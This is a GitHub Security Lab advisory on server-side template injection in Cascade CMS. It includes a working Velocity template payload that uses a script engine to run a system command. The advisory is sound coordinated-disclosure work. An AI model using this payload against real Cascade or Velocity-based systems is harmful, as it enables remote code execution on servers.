August 19, 2020

GHSL-2020-076: Server-Side Template Injection in Cascade CMS

Alvaro Muñoz

Summary

A user with privileges to edit templates may execute arbitrary Java code or run arbitrary system commands with the same privileges as the account running Cascade CMS.

Product

Cascade CMS

Tested Version

Cascade CMS v8.14.cloud5 (57164371131571924e45d18fbd2725f3d8d124d4)

Details

Server-Side Template Injection (Velocity)

Cascade CMS does not use the Velocity SecureUberspector, which allows attackers that are able to modify or create templates to execute arbitrary Java code and achieve remote code execution. For example the following template will run the system id command:

##### $scriptEngine = $currentPage.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js') )
${scriptEngine.eval("var x=new java.lang.ProcessBuilder('id'); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())")}

In addition, Cascade CMS exposes Velocity FieldTool through the $_FieldTool variable. This tool allows accessing any public static field on any class reachable by the Velocity ClassLoader.

Impact

This issue may lead to Remote Code Execution.

Coordinated Disclosure Timeline

  • 04/17/2020: Sent report to vendor.
  • 04/17/2020: Vendor acknowledges the issue.
  • 04/27/2020: Issue is fixed.

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Munoz).

Contact

You can contact the GHSL team at securitylab@github.com, please include the GHSL-2020-076 in any communication regarding this issue.